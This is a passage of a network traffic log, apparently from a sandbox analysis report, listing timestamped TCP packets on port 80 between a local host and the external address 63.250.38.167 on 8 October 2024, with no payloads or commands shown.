Oct 8, 2024 11:31:51.727097988 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727108955 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727119923 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727123022 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727145910 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727160931 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727170944 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727186918 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727199078 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727199078 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727200031 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727212906 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727216005 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727225065 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727253914 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727277994 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727310896 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727488995 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727499962 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727514029 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727523088 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727533102 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727544069 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727555037 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727566957 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727576971 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727580070 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727580070 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727580070 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727627993 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727638960 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727649927 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727660894 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727670908 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727670908 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727670908 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727670908 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727683067 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727778912 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727790117 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727801085 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727812052 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727823019 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727830887 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727830887 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727830887 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727834940 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727848053 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727946043 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727956057 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727966070 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727976084 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727987051 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.727988005 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727988005 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.727988005 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728005886 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728017092 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728022099 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728025913 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728025913 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728034973 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728046894 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728058100 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728068113 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728072882 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728072882 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728079081 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728144884 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728144884 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728286028 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728296995 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728308916 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728319883 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728332043 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728341103 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728344917 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728353024 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728401899 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728401899 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728410006 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728424072 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728435040 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728446007 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728461981 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728468895 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728468895 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728473902 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728487015 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728497028 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728507996 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728524923 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728524923 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728542089 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728573084 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728609085 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728620052 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728631020 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728657961 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728662968 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728674889 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728686094 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728714943 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728714943 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728776932 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728794098 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728805065 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728816032 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728827953 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728837967 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728849888 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728866100 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728866100 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728866100 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728915930 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728926897 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728929043 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728944063 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728955030 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728965044 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728966951 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.728976965 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.728990078 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729001045 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729012966 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729022980 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729032040 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729032040 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729074955 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729074955 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729140043 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729151011 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729161978 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729208946 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729223013 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729233027 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729244947 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729249954 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729249954 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729274988 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729279041 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729341030 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729345083 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729357958 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729370117 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729381084 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729391098 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729419947 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729489088 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729510069 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729546070 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729584932 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729597092 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729629040 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729640007 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729649067 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729651928 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729665995 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729705095 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729705095 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729737043 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729748011 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729759932 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729770899 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729782104 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729792118 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:51.729795933 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729796886 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:51.729854107 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019247055 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019259930 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019273043 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019284010 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019301891 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019314051 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019325972 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019339085 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019339085 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019344091 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019356966 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019370079 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019391060 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019397020 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019411087 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019411087 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019428968 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019439936 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019452095 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019468069 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019479990 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019491911 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019493103 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019493103 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019501925 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019515038 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019531965 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019581079 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019593954 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019604921 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019614935 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019624949 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019635916 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019639015 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019642115 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019656897 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019668102 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019689083 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019697905 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019697905 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019699097 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019706964 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019706964 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019716978 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019727945 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019738913 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019745111 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019751072 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019762993 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019776106 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019783974 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019783974 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019792080 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019804001 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019814968 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019824982 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019830942 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019830942 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019840002 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019854069 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019864082 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019875050 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019875050 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019875050 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019886971 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019897938 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019906998 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019908905 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019917965 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019929886 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019933939 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019939899 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019952059 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019964933 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019975901 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.019979000 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019979000 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.019989014 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020006895 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020019054 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020026922 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020026922 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020036936 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020051003 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020061970 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020072937 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020083904 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020095110 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020096064 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020096064 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020106077 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020142078 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020149946 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020162106 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020169973 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020180941 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020188093 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020188093 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020194054 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020204067 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020210028 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020220995 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020231962 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020242929 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020243883 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020243883 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020256042 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020267963 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020294905 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020307064 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020308971 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020308971 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020318985 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020330906 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020342112 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020353079 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020359039 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020359039 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020365000 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020378113 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020390987 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020401001 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020405054 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020405054 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020412922 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020423889 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020431995 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020446062 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020457029 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020467043 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020468950 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020482063 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020493984 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020503998 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020517111 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020518064 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020518064 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020529032 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020540953 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020550966 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020562887 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020565033 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020565987 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020574093 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020586014 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020596027 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020608902 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020617962 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020617962 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020621061 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020633936 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020644903 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020648956 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020648956 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020658016 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020668030 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020678997 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020690918 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020701885 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020701885 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020720005 CEST	50001	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:52.020735025 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020746946 CEST	80	50001	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:52.020759106 CEST	80	50001	63.250.38.167	192.168.2.6
